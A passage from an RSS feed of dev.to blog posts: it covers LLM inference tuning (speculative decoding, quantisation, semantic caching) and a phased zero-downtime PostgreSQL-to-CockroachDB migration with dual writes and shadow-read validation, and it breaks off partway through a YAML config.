&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;vllm&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;LLM&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;SamplingParams&lt;/span&gt;

&lt;span class="n"&gt;llm&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;LLM&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;model&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;meta-llama/Llama-3-70B&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;speculative_model&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;meta-llama/Llama-3-8B&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="c1"&gt;# Draft model
&lt;/span&gt;    &lt;span class="n"&gt;num_speculative_tokens&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="c1"&gt;# Generate 5 draft tokens per step
&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Impact:&lt;/strong&gt; 1.5-2.5x speedup for generation-heavy workloads. The speedup is highest when the output is predictable (common language patterns, structured data) and lowest for creative/novel outputs.&lt;/p&gt;
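
&lt;p&gt;A toy cost model makes the "predictable outputs win" claim concrete. Assume each draft token is accepted independently with some probability, and a draft forward pass costs about 10% of a target-model pass; both numbers are assumptions, and the model is a simplification of the standard speculative-sampling analysis:&lt;/p&gt;

```python
def expected_speedup(accept_rate, k, draft_cost=0.1):
    """Toy speedup model for speculative decoding: k draft tokens per
    step, each accepted independently with probability accept_rate
    (must be below 1), one draft pass costing draft_cost of a target
    pass. All numbers are illustrative assumptions."""
    a = accept_rate
    # Tokens per verification step: the accepted prefix plus the one
    # token the target model always contributes = 1 + a + ... + a^k.
    expected_tokens = (1 - a ** (k + 1)) / (1 - a)
    step_cost = k * draft_cost + 1.0  # k draft passes + 1 target pass
    return expected_tokens / step_cost
```

&lt;p&gt;With an 80% acceptance rate and 5 draft tokens this gives roughly 2.5x; at 30% acceptance it drops below 1x, which is why creative workloads can end up slower than plain decoding.&lt;/p&gt;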

&lt;h2&gt;
  
  
  Combining All Three
&lt;/h2&gt;

&lt;p&gt;The techniques stack. Here's the configuration we use for a production chatbot serving 10K requests/hour:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;llm&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;LLM&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;model&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;TheBloke/Llama-3-70B-AWQ&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;     &lt;span class="c1"&gt;# INT4 quantization
&lt;/span&gt;    &lt;span class="n"&gt;quantization&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;awq&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;speculative_model&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;TheBloke/Llama-3-8B-AWQ&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="c1"&gt;# Quantized draft
&lt;/span&gt;    &lt;span class="n"&gt;num_speculative_tokens&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;tensor_parallel_size&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;                 &lt;span class="c1"&gt;# 2x A100 40GB
&lt;/span&gt;    &lt;span class="n"&gt;max_num_batched_tokens&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;32768&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;           &lt;span class="c1"&gt;# Continuous batching
&lt;/span&gt;    &lt;span class="n"&gt;max_num_seqs&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;256&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Results vs naive FP16 serving:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Throughput:&lt;/strong&gt; 12 req/s → 89 req/s (7.4x)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;P50 latency:&lt;/strong&gt; 2.1s → 0.4s (5.2x faster)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;GPU cost:&lt;/strong&gt; 4x A100 80GB → 2x A100 40GB (60% cost reduction)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Quality:&lt;/strong&gt; &amp;lt;2% regression on MMLU benchmark&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Common Mistakes
&lt;/h2&gt;

&lt;p&gt;Before diving into infrastructure recommendations, avoid these pitfalls we've seen repeatedly:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Quantizing without benchmarking on YOUR data.&lt;/strong&gt; Generic benchmarks (MMLU, HumanEval) don't reflect your use case. A model that scores well on academic benchmarks might hallucinate on your domain-specific queries after quantization. Always evaluate on a test set from your actual production traffic.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Using speculative decoding for creative tasks.&lt;/strong&gt; Speculative decoding works best when the output is predictable — structured data, common language patterns, templated responses. For creative writing or novel reasoning, the draft model's predictions are wrong more often, reducing the speedup to near zero.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Ignoring cold start latency.&lt;/strong&gt; vLLM's first request after loading a model takes 5-10x longer than subsequent requests due to CUDA kernel compilation. If your traffic is bursty, keep models warm with synthetic heartbeat requests.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Over-optimizing throughput at the expense of latency.&lt;/strong&gt; Increasing batch size improves throughput but hurts tail latency. For interactive applications (chatbots, autocomplete), optimize for P95 latency first, then tune throughput.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
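
&lt;p&gt;Mistake 3 is cheap to fix. A minimal keep-warm loop might look like this; &lt;code&gt;send&lt;/code&gt; is an injected callable standing in for an HTTP POST to your inference endpoint (the endpoint and payload shape are assumptions, not vLLM's API):&lt;/p&gt;

```python
import threading

def keep_warm(send, interval_s=60.0, stop_event=None, max_beats=None):
    """Fire a minimal request on a fixed interval so CUDA kernels stay
    compiled and the model stays resident. `send` performs one
    inference call; `max_beats` bounds the loop for testing."""
    stop_event = stop_event or threading.Event()
    beats = 0
    while not stop_event.is_set():
        send({"prompt": "ping", "max_tokens": 1})  # smallest possible request
        beats += 1
        if max_beats is not None and beats >= max_beats:
            break
        stop_event.wait(interval_s)
    return beats
```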

&lt;h2&gt;
  
  
  Infrastructure Recommendations
&lt;/h2&gt;

&lt;h3&gt;
  
  
  For Startups (&amp;lt; $5K/month inference budget)
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Use vLLM with AWQ quantization on a single A100 40GB&lt;/li&gt;
&lt;li&gt;Start with Llama-3-8B-AWQ — surprisingly capable for most use cases&lt;/li&gt;
&lt;li&gt;Add speculative decoding if latency matters more than throughput&lt;/li&gt;
&lt;li&gt;Monitor with Prometheus — track tokens/second, queue depth, and P95 latency&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  For Mid-Market ($5K-$50K/month)
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;vLLM cluster with continuous batching and tensor parallelism&lt;/li&gt;
&lt;li&gt;A/B test INT8 vs INT4 quantization for your specific use case&lt;/li&gt;
&lt;li&gt;Implement request routing: simple queries to 8B model, complex to 70B&lt;/li&gt;
&lt;li&gt;Add semantic caching (Redis + embeddings) for repeated queries — cuts 30-40% of inference calls&lt;/li&gt;
&lt;/ul&gt;
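
&lt;p&gt;The semantic-caching bullet deserves a sketch. This toy in-memory version shows the shape; a production setup would swap the list scan for Redis plus a vector index, and &lt;code&gt;embed&lt;/code&gt; (a hypothetical injected function) for a real embedding model:&lt;/p&gt;

```python
import math

class SemanticCache:
    """Toy semantic cache: store (embedding, response) pairs and return
    a cached response when a new query's cosine similarity clears the
    threshold. A sketch, not a production implementation."""

    def __init__(self, embed, threshold=0.92):
        self.embed = embed        # injected: text -> vector
        self.entries = []         # list of (vector, response)
        self.threshold = threshold

    @staticmethod
    def _cosine(a, b):
        dot = sum(x * y for x, y in zip(a, b))
        na = math.sqrt(sum(x * x for x in a))
        nb = math.sqrt(sum(x * x for x in b))
        return dot / (na * nb) if na and nb else 0.0

    def get(self, query):
        v = self.embed(query)
        best = max(self.entries, key=lambda e: self._cosine(v, e[0]),
                   default=None)
        if best and self._cosine(v, best[0]) >= self.threshold:
            return best[1]  # cache hit: the LLM call is skipped entirely
        return None

    def put(self, query, response):
        self.entries.append((self.embed(query), response))
```

&lt;p&gt;The threshold is the knob to tune: too low and users get answers to questions they didn't ask, too high and the hit rate collapses.&lt;/p&gt;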

&lt;h3&gt;
  
  
  For Enterprise ($50K+/month)
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Triton Inference Server for multi-model serving and advanced scheduling&lt;/li&gt;
&lt;li&gt;Custom quantization calibrated on your domain data&lt;/li&gt;
&lt;li&gt;Speculative decoding with fine-tuned draft models&lt;/li&gt;
&lt;li&gt;Multi-region deployment with intelligent routing based on model availability and latency&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;Need help optimizing your LLM inference costs? We've deployed inference stacks that serve millions of requests at a fraction of the typical cost. &lt;a href="https://techsaas.cloud/contact" rel="noopener noreferrer"&gt;Book a consultation&lt;/a&gt; or explore our &lt;a href="https://techsaas.cloud/services" rel="noopener noreferrer"&gt;AI infrastructure services&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>tutorial</category>
      <category>programming</category>
      <category>devops</category>
    </item>
    <item>
      <title>Zero-Downtime Database Migration: Shadow Writes, Dual-Read, and the 12-Second Cutover</title>
      <dc:creator>Yash Pritwani</dc:creator>
      <pubDate>Thu, 07 May 2026 06:00:07 +0000</pubDate>
      <link>https://dev.to/yash_pritwani_07a77613fd6/zero-downtime-database-migration-shadow-writes-dual-read-and-the-12-second-cutover-2k33</link>
      <guid>https://dev.to/yash_pritwani_07a77613fd6/zero-downtime-database-migration-shadow-writes-dual-read-and-the-12-second-cutover-2k33</guid>
      <description>&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/database-migration-zero-downtime-shadow-writes" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;








&lt;h1&gt;
  
  
  Zero-Downtime Database Migration: Shadow Writes, Dual-Read, and the 12-Second Cutover
&lt;/h1&gt;

&lt;p&gt;Database migrations are the scariest infrastructure change you can make. Your data is the one thing you absolutely cannot lose, corrupt, or make unavailable.&lt;/p&gt;

&lt;p&gt;We migrated a 2TB PostgreSQL database to CockroachDB for a SaaS client with zero downtime, zero data loss, and a cutover that took 12 seconds. Here's the complete playbook.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why Not Just pg_dump and Restore?
&lt;/h2&gt;

&lt;p&gt;For a 2TB database, pg_dump takes roughly 4-8 hours depending on your hardware. During that time, your application is either down or writing data that won't be in the dump. You'd need a maintenance window, and for a SaaS product with global users, "maintenance windows" mean lost revenue and broken SLAs.&lt;/p&gt;

&lt;p&gt;The shadow-write approach eliminates the maintenance window entirely.&lt;/p&gt;

&lt;h2&gt;
  
  
  Phase 1: Dual-Write Setup
&lt;/h2&gt;

&lt;p&gt;The core idea: write every mutation to BOTH the old database (Postgres) and the new database (CockroachDB) simultaneously.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;DualWriteMiddleware&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;__init__&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;primary_db&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;shadow_db&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;primary&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;primary_db&lt;/span&gt;    &lt;span class="c1"&gt;# Postgres (source of truth)
&lt;/span&gt;        &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;shadow&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;shadow_db&lt;/span&gt;      &lt;span class="c1"&gt;# CockroachDB (catching up)
&lt;/span&gt;        &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;shadow_failure_queue&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[]&lt;/span&gt;  &lt;span class="c1"&gt;# failed shadow writes, replayed later
&lt;/span&gt;
    &lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;execute_write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;query&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;params&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="c1"&gt;# Primary write — this is the source of truth
&lt;/span&gt;        &lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;primary&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;execute&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;query&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;params&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# Shadow write — async, failures logged but don't affect user
&lt;/span&gt;        &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="n"&gt;asyncio&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;wait_for&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
                &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;shadow&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;execute&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;query&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;params&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                &lt;span class="n"&gt;timeout&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mf"&gt;5.0&lt;/span&gt;
            &lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;except&lt;/span&gt; &lt;span class="nb"&gt;Exception&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="n"&gt;log&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;warning&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Shadow write failed: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;shadow_failure_queue&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;append&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="n"&gt;query&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;params&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Key rules:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Primary database (Postgres) is always the source of truth&lt;/li&gt;
&lt;li&gt;Shadow writes are best-effort with a short timeout — failures are logged and retried, never shown to users&lt;/li&gt;
&lt;li&gt;A failure queue captures any shadow writes that fail, for replay later&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Duration:&lt;/strong&gt; We ran dual-write for 2 weeks before moving to Phase 2.&lt;/p&gt;
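
&lt;p&gt;The failure queue is only useful if something drains it. A replay worker might look like this; the &lt;code&gt;execute&lt;/code&gt; interface matches the middleware above, and the retry count is an arbitrary choice:&lt;/p&gt;

```python
async def replay_failed_shadow_writes(shadow_db, failure_queue, max_retries=3):
    """Drain the shadow-write failure queue against the shadow database.
    Writes that still fail after retries are returned so an operator
    can inspect them instead of silently losing data."""
    dead_letters = []
    while failure_queue:
        query, params = failure_queue.pop(0)
        for attempt in range(max_retries):
            try:
                await shadow_db.execute(query, params)
                break  # replayed successfully
            except Exception:
                if attempt == max_retries - 1:
                    dead_letters.append((query, params))
    return dead_letters
```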

&lt;h2&gt;
  
  
  Phase 2: Historical Data Migration
&lt;/h2&gt;

&lt;p&gt;While dual-writes handle new data, you need to backfill historical data. We used a chunked migration approach:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Migrate in 10,000-row chunks with checkpointing&lt;/span&gt;
python migrate.py &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--source&lt;/span&gt; postgres://prod-primary:5432/app &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--target&lt;/span&gt; cockroach://cockroach-cluster:26257/app &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--table&lt;/span&gt; orders &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--chunk-size&lt;/span&gt; 10000 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--checkpoint-file&lt;/span&gt; /tmp/migration-orders.checkpoint
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The checkpoint file tracks the last migrated primary key, so you can restart the migration without re-processing. For a 2TB database, this took about 18 hours running at low priority (to avoid impacting production reads).&lt;/p&gt;
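
&lt;p&gt;Under assumed interfaces (none of these are migrate.py's real flags or API), the core loop is keyset pagination plus a persisted checkpoint:&lt;/p&gt;

```python
def migrate_table(fetch_chunk, write_chunk, load_checkpoint, save_checkpoint,
                  chunk_size=10_000):
    """Keyset-paginated backfill with a crash-safe resume point. The
    four callables are injected stand-ins: fetch rows ordered by
    primary key after a given key, write them to the target, and
    load/save the last migrated key."""
    last_pk = load_checkpoint()  # None on a fresh run
    total = 0
    while True:
        rows = fetch_chunk(after_pk=last_pk, limit=chunk_size)
        if not rows:
            break
        write_chunk(rows)
        last_pk = rows[-1][0]     # rows are ordered by primary key
        save_checkpoint(last_pk)  # a restart resumes here, no re-processing
        total += len(rows)
    return total
```

&lt;p&gt;Keyset pagination (WHERE id &amp;gt; last_pk ORDER BY id LIMIT n) matters here: OFFSET-based pagination gets slower with every chunk on a 2TB table.&lt;/p&gt;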

&lt;h2&gt;
  
  
  Phase 3: Shadow-Read Validation
&lt;/h2&gt;

&lt;p&gt;This is where most migration guides stop, and where most migrations fail. Before cutting over reads, you need to validate that CockroachDB returns the same results as Postgres.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;ShadowReadValidator&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;validate_read&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;query&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;params&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="c1"&gt;# Read from both
&lt;/span&gt;        &lt;span class="n"&gt;primary_result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;primary&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;execute&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;query&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;params&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;shadow_result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;shadow&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;execute&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;query&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;params&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# Compare
&lt;/span&gt;        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;primary_result&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="n"&gt;shadow_result&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="n"&gt;log&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;error&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;READ MISMATCH: query=&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;query&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;log&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;error&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;  Postgres: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;primary_result&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="si"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;100&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;log&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;error&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;  CockroachDB: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;shadow_result&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="si"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;100&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;mismatch_counter&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;inc&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

        &lt;span class="c1"&gt;# Always return primary result
&lt;/span&gt;        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;primary_result&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We ran shadow-read validation on 10% of production read traffic for one week. Results:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;47 query incompatibilities found&lt;/strong&gt; (mostly around timestamp precision and JSON operator differences)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;3 data mismatches&lt;/strong&gt; (all from shadow-write failures that hadn't been replayed yet)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;0 correctness bugs&lt;/strong&gt; in CockroachDB itself&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Each incompatibility was fixed by updating the application query or adding a compatibility layer. This validation phase is the most valuable part of the entire migration — it catches problems before they affect users.&lt;/p&gt;
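
&lt;p&gt;Most of the incompatibilities we found were representational, not logical. A comparison that normalizes the known differences before diffing avoids drowning in false positives; here, timestamps are truncated to millisecond precision (a sketch — your list of normalizations will differ):&lt;/p&gt;

```python
from datetime import datetime

def normalize_row(row):
    """Truncate datetime values to millisecond precision so Postgres
    microsecond timestamps compare equal to their CockroachDB copies."""
    return tuple(
        v.replace(microsecond=(v.microsecond // 1000) * 1000)
        if isinstance(v, datetime) else v
        for v in row
    )

def rows_match(primary_rows, shadow_rows):
    """Order-sensitive comparison after normalization."""
    return ([normalize_row(r) for r in primary_rows]
            == [normalize_row(r) for r in shadow_rows])
```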

&lt;h2&gt;
  
  
  Phase 4: Traffic Shifting
&lt;/h2&gt;

&lt;p&gt;Once shadow-reads show zero mismatches for 48 hours, gradually shift read traffic:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Feature flag configuration&lt;/span&gt;
&lt;span class="na"&gt;database_read_routing&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;cockroach_percentage&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;5&lt;/span&gt;     &lt;span class="c1"&gt;# Start at 5%&lt;/span&gt;
  &lt;span class="na"&gt;escalation_schedule&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
